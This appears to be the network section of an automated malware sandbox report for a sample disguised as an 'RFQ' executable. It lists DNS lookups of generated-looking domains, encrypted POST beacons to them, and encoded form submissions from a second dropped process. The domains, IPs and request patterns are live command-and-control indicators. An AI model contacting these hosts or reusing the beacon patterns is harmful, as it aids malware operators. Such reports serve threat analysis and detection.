Dec 9, 2024 08:32:37.686578035 CET	51505	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:32:38.341521025 CET	53	51505	1.1.1.1	192.168.2.7
Dec 9, 2024 08:32:54.819766045 CET	60999	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:32:55.293795109 CET	53	60999	1.1.1.1	192.168.2.7
Dec 9, 2024 08:33:09.960120916 CET	61593	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:33:10.743262053 CET	53	61593	1.1.1.1	192.168.2.7
Dec 9, 2024 08:33:26.022675991 CET	51711	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:33:26.510217905 CET	53	51711	1.1.1.1	192.168.2.7
Dec 9, 2024 08:33:41.040391922 CET	62921	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:33:41.567781925 CET	53	62921	1.1.1.1	192.168.2.7
Dec 9, 2024 08:33:44.570190907 CET	56591	53	192.168.2.7	1.1.1.1
Dec 9, 2024 08:33:45.060858965 CET	53	56591	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 9, 2024 08:31:38.396184921 CET	192.168.2.7	1.1.1.1	0xd855	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:31:41.623745918 CET	192.168.2.7	1.1.1.1	0xe8b3	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:31:42.000174046 CET	192.168.2.7	1.1.1.1	0x807	Standard query (0)	pywolwnvd.biz	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:31:43.790455103 CET	192.168.2.7	1.1.1.1	0x1ca3	Standard query (0)	ssbzmoy.biz	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:32:37.686578035 CET	192.168.2.7	1.1.1.1	0x7651	Standard query (0)	www.sunnyz.store	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:32:54.819766045 CET	192.168.2.7	1.1.1.1	0x36a0	Standard query (0)	www.d48dk.top	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:09.960120916 CET	192.168.2.7	1.1.1.1	0x3ba2	Standard query (0)	www.8312zcksnu.bond	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:26.022675991 CET	192.168.2.7	1.1.1.1	0x7c80	Standard query (0)	www.snyp.shop	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:41.040391922 CET	192.168.2.7	1.1.1.1	0xe915	Standard query (0)	www.duwixushx.xyz	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:44.570190907 CET	192.168.2.7	1.1.1.1	0x450f	Standard query (0)	fwiwk.biz	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 9, 2024 08:31:38.960129976 CET	1.1.1.1	192.168.2.7	0xd855	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:31:42.137850046 CET	1.1.1.1	192.168.2.7	0x807	No error (0)	pywolwnvd.biz		54.244.188.177	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:31:42.175689936 CET	1.1.1.1	192.168.2.7	0xe8b3	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:31:43.928740025 CET	1.1.1.1	192.168.2.7	0x1ca3	No error (0)	ssbzmoy.biz		18.141.10.107	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:32:00.395513058 CET	1.1.1.1	192.168.2.7	0x6abe	Name error (3)	zlenh.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:32:03.739913940 CET	1.1.1.1	192.168.2.7	0xb770	Name error (3)	uhxqin.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:32:03.954391956 CET	1.1.1.1	192.168.2.7	0x15eb	Name error (3)	anpmnmxo.biz	none	none	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:32:38.341521025 CET	1.1.1.1	192.168.2.7	0x7651	No error (0)	www.sunnyz.store	webredir.vip.gandi.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 08:32:38.341521025 CET	1.1.1.1	192.168.2.7	0x7651	No error (0)	webredir.vip.gandi.net		217.70.184.50	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:32:55.293795109 CET	1.1.1.1	192.168.2.7	0x36a0	No error (0)	www.d48dk.top	d48dk.top		CNAME (Canonical name)	IN (0x0001)	false
Dec 9, 2024 08:32:55.293795109 CET	1.1.1.1	192.168.2.7	0x36a0	No error (0)	d48dk.top		154.23.184.207	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:10.743262053 CET	1.1.1.1	192.168.2.7	0x3ba2	No error (0)	www.8312zcksnu.bond		38.165.29.234	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:26.510217905 CET	1.1.1.1	192.168.2.7	0x7c80	No error (0)	www.snyp.shop		13.248.169.48	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:26.510217905 CET	1.1.1.1	192.168.2.7	0x7c80	No error (0)	www.snyp.shop		76.223.54.146	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:41.567781925 CET	1.1.1.1	192.168.2.7	0xe915	No error (0)	www.duwixushx.xyz		156.251.17.224	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:45.060858965 CET	1.1.1.1	192.168.2.7	0x450f	No error (0)	fwiwk.biz		172.234.222.143	A (IP address)	IN (0x0001)	false
Dec 9, 2024 08:33:45.060858965 CET	1.1.1.1	192.168.2.7	0x450f	No error (0)	fwiwk.biz		172.234.222.138	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pywolwnvd.biz

ssbzmoy.biz

cvgrf.biz

knjghuig.biz

www.sunnyz.store

www.d48dk.top

www.8312zcksnu.bond

www.snyp.shop

www.duwixushx.xyz

vcddkls.biz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49704	54.244.188.177	80	5784	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:31:40.299113989 CET	357	OUT	POST /yjbljodlunyh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 838
Dec 9, 2024 08:31:40.299176931 CET	838	OUT	Data Raw: 4c 4a f9 a0 81 90 bd d6 3a 03 00 00 93 0a ff 09 ef 33 23 98 58 ee d4 cd e8 f3 e1 e8 fa 86 e3 03 40 c2 c5 22 31 8f a2 df 54 b2 db d7 4b d1 a7 6f d9 d2 18 2c 56 3b 4f 8e 52 47 c4 0a 31 3f a9 e6 32 ee bb 39 ba 68 68 0d 07 da fa dd 56 93 21 55 48 fb Data Ascii: LJ:3#X@"1TKo,V;ORG1?29hhV!UHV,DL&,=o*RR[yvc]^5.H>w@M^)?eVIR=7ou1Lj`.v#{c%u.UM~}GyNqSH
Dec 9, 2024 08:31:41.614429951 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:31:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a0d774400e224fd3512fec35bea2cd08\|8.46.123.228\|1733729501\|1733729501\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	18.141.10.107	80	5784	C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:31:42.358186007 CET	353	OUT	POST /punqdgkybi HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 838
Dec 9, 2024 08:31:42.358269930 CET	838	OUT	Data Raw: 49 ec a3 0c d3 6b 0b 61 3a 03 00 00 5a de 97 3d 43 ed 13 34 1b d8 87 17 13 49 02 d2 df b7 a5 f4 4d b2 d8 b4 19 e7 88 b6 79 ce 9e 91 13 ce 12 20 6b b6 f3 d2 91 25 16 56 e9 50 c3 9a 13 dd e2 41 fe 09 88 81 4b d0 15 3d b1 d2 e4 ea 7a e5 e7 42 92 8c Data Ascii: Ika:Z=C4IMy k%VPAK=zB;11s<WBeok0w!M],6g/@ROaTLueD9mk'G})RV=bV`rzytnFZTN%k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49706	54.244.188.177	80

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:31:42.358412027 CET	350	OUT	POST /jigtx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: pywolwnvd.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Dec 9, 2024 08:31:42.358468056 CET	874	OUT	Data Raw: 32 4b c9 22 0c 1c 71 13 5e 03 00 00 fd 69 6a b6 b9 8b d4 40 02 c2 ee c3 4d f1 14 6f c8 34 d3 c6 38 f8 bf 29 a9 27 57 e2 48 5d 54 d5 7a 26 a5 4c 32 e4 34 f6 b4 b2 30 50 e3 c8 7a f5 e0 ef 97 36 3f 0d 05 4b 61 5e 74 ae a5 8c 38 c7 9e 8b 2c 3f 81 17 Data Ascii: 2K"q^ij@Mo48)'WH]Tz&L240Pz6?Ka^t8,?\|pA_:6.Z A^PfL?p8'N3L{U>+)<2GIDi55(xYDD^{E`FlG*-6w&L\|q3Y$S9
Dec 9, 2024 08:31:43.700547934 CET	413	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:31:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=347d19335652ae8fe6635df2cb790427\|8.46.123.228\|1733729503\|1733729503\|0\|1\|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49707	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:31:44.739836931 CET	344	OUT	POST /s HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Dec 9, 2024 08:31:44.739856958 CET	874	OUT	Data Raw: 2e ec 73 8e 5e f7 bf 9e 5e 03 00 00 da 09 7a 2d c3 78 a7 18 89 97 25 b2 45 0a f2 18 c1 55 ab 2b d4 12 8e eb fd 0a a0 f5 8f 26 f5 6f 92 f0 d0 cb e0 2b 1d 87 d0 05 0b ce b6 30 14 9d 99 57 6e dc 1f c5 85 26 09 5c e9 0a 6a 53 38 97 7d c9 23 62 71 e0 Data Ascii: .s^^z-x%EU+&o+0Wn&\jS8}#bqkOcm(bZcl3J!F1a(xZ2gm$-<yp)FROK{M2IB?@+}W-t\|L5=*a+_
Dec 9, 2024 08:31:46.800705910 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:31:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=054ef3b02390152d3c1504bf226f4e54\|8.46.123.228\|1733729506\|1733729506\|0\|1\|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49708	54.244.188.177	80

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:31:48.420357943 CET	346	OUT	POST /rtjcy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: cvgrf.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Dec 9, 2024 08:31:48.420357943 CET	874	OUT	Data Raw: e8 3a 00 ab 29 e2 0a c7 5e 03 00 00 4e 6c 0b ab 0d b0 a1 ff f5 a8 f5 96 79 d6 29 b7 22 df 2f c5 d0 a1 ab 21 09 34 ed ed dd a9 66 fd 6e 7e 6b f9 13 c4 5f b0 89 41 f3 b5 91 35 ab f3 79 61 6a 79 db 2b 33 3b 0e 38 ac a1 71 83 4a db 46 9f 51 8b a5 67 Data Ascii: :)^Nly)"/!4fn~k_A5yajy+3;8qJFQgj--cjMTw?V'D8_,/YhZaGJxsyiZ%sWenm\F!>"{[5X=fYi#G3zYcIj"h
Dec 9, 2024 08:31:49.770889997 CET	409	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:31:49 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=6e118939ea2b157c5c1dac7cc7da8e3c\|8.46.123.228\|1733729509\|1733729509\|0\|1\|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49718	18.141.10.107	80

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:32:01.175236940 CET	357	OUT	POST /rrxdfrjngeyag HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: knjghuig.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 874
Dec 9, 2024 08:32:01.175236940 CET	874	OUT	Data Raw: 81 02 a1 ce d5 05 d7 aa 5e 03 00 00 e3 65 6f 9d 4d da f0 aa 20 4c ef ad 73 dd 0d 88 a8 ef c6 3f 5f b8 94 fe ed ce 07 50 0f 82 f0 8f 10 75 c2 73 b0 b6 12 08 b0 45 c7 cf 15 86 4b 85 08 15 06 53 65 fa 70 5b a1 57 01 9d c4 3e a5 75 ac 7f 32 e8 a0 d8 Data Ascii: ^eoM Ls?_PusEKSep[W>u2hGG(^'T# !~rILKvpZ3/Z*WcdJI%iFQ)k/K4X340MEGof0[on6Bhm(3T_kwLr1
Dec 9, 2024 08:32:03.207288027 CET	412	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:32:02 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=6d32ccb43aac17edba35bc2bd6ac0ece\|8.46.123.228\|1733729522\|1733729522\|0\|1\|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49722	217.70.184.50	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:32:38.480850935 CET	538	OUT	GET /px6j/?9dfhu=10RxttPPB0&6Pvh8TXP=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKLb8lxYxVUxpwQ/Of0rti0wTIxJq6JAsDgXxJoFbzTbGnD1j7Uz133QdH HTTP/1.1 Host: www.sunnyz.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Dec 9, 2024 08:32:39.721884012 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Dec 2024 07:32:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Security-Policy: default-src 'self'; script-src 'nonce-8188373b03e546a4b1c3d91b3b4d453f'; Vary: Accept-Language Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 38 31 38 38 33 37 33 62 30 33 65 35 34 36 61 34 62 31 63 33 64 39 31 62 33 62 34 64 34 35 33 66 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED] Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-8188373b03e546a4b1c3d91b3b4d453f';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
Dec 9, 2024 08:32:39.722048044 CET	1236	IN	Data Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
Dec 9, 2024 08:32:39.722059965 CET	160	IN	Data Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27 Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49735	154.23.184.207	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:32:55.440675974 CET	785	OUT	POST /9ffw/ HTTP/1.1 Host: www.d48dk.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.d48dk.top Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 221 Referer: http://www.d48dk.top/9ffw/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 4a 63 30 6c 4e 53 4f 49 4c 5a 62 6c 7a 6b 49 2f 57 46 46 33 4d 45 6e 78 63 57 73 49 54 58 61 73 75 68 4a 36 68 4e 4f 57 71 61 36 50 6f 50 49 6d 72 71 49 72 32 70 4d 51 51 74 56 49 43 59 76 30 42 77 38 55 2f 78 68 62 32 6d 49 75 5a 48 73 65 77 6e 75 36 74 6e 31 61 68 69 75 63 52 2b 32 50 51 66 63 4e 69 65 53 2f 31 51 2b 30 75 32 62 38 47 39 6b 6a 43 4b 73 78 33 67 6c 55 77 79 56 50 74 64 6f 54 75 72 62 67 41 56 55 31 58 75 79 38 61 57 34 5a 38 75 6c 77 66 6a 30 4d 4f 5a 48 6a 6e 31 39 35 4c 78 65 68 6c 49 47 63 57 2b 4d 55 4b 37 79 45 70 35 4a 75 41 2b 4a 73 37 4a 78 6a 4a 55 4c 48 51 3d 3d Data Ascii: 6Pvh8TXP=gCyAac3FM9KhZJc0lNSOILZblzkI/WFF3MEnxcWsITXasuhJ6hNOWqa6PoPImrqIr2pMQQtVICYv0Bw8U/xhb2mIuZHsewnu6tn1ahiucR+2PQfcNieS/1Q+0u2b8G9kjCKsx3glUwyVPtdoTurbgAVU1Xuy8aW4Z8ulwfj0MOZHjn195LxehlIGcW+MUK7yEp5JuA+Js7JxjJULHQ==
Dec 9, 2024 08:32:56.947251081 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Dec 2024 07:32:56 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49741	154.23.184.207	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
Dec 9, 2024 08:32:58.109345913 CET	805	OUT	POST /9ffw/ HTTP/1.1 Host: www.d48dk.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Origin: http://www.d48dk.top Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: max-age=0 Content-Length: 241 Referer: http://www.d48dk.top/9ffw/ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36 Data Raw: 36 50 76 68 38 54 58 50 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 6f 73 30 70 4e 75 4f 41 4c 5a 59 71 54 6b 49 32 32 46 42 33 4e 34 6e 78 59 75 38 49 68 6a 61 73 4d 70 4a 35 6c 52 4f 52 71 61 36 48 49 50 42 72 4c 71 48 72 32 6c 45 51 55 74 56 49 47 49 76 30 44 6f 38 56 4f 78 6d 62 6d 6d 57 68 35 47 4b 54 51 6e 75 36 74 6e 31 61 68 32 45 63 52 32 32 4f 68 76 63 4d 44 65 4e 68 6c 51 2f 33 75 32 62 76 57 39 67 6a 43 4c 4a 78 79 49 62 55 79 4b 56 50 70 5a 6f 51 2f 72 45 35 51 56 53 72 6e 76 45 33 50 6e 58 51 65 2b 69 33 74 7a 38 43 4d 70 39 6d 52 30 66 6a 70 39 79 2f 30 77 39 59 55 61 36 44 73 6d 48 47 6f 39 52 6a 69 4b 6f 7a 4d 73 62 75 62 31 50 52 70 35 35 35 69 45 36 6c 55 59 6d 55 5a 2b 46 2b 48 45 31 67 34 30 3d Data Ascii: 6Pvh8TXP=gCyAac3FM9KhZos0pNuOALZYqTkI22FB3N4nxYu8IhjasMpJ5lRORqa6HIPBrLqHr2lEQUtVIGIv0Do8VOxmbmmWh5GKTQnu6tn1ah2EcR22OhvcMDeNhlQ/3u2bvW9gjCLJxyIbUyKVPpZoQ/rE5QVSrnvE3PnXQe+i3tz8CMp9mR0fjp9y/0w9YUa6DsmHGo9RjiKozMsbub1PRp555iE6lUYmUZ+F+HE1g40=
Dec 9, 2024 08:32:59.630390882 CET	302	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 09 Dec 2024 07:32:59 GMT Content-Type: text/html Content-Length: 138 Connection: close ETag: "66927002-8a" Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49747	154.23.184.207	80	5576	C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe

Timestamp	Bytes transferred	Direction	Data
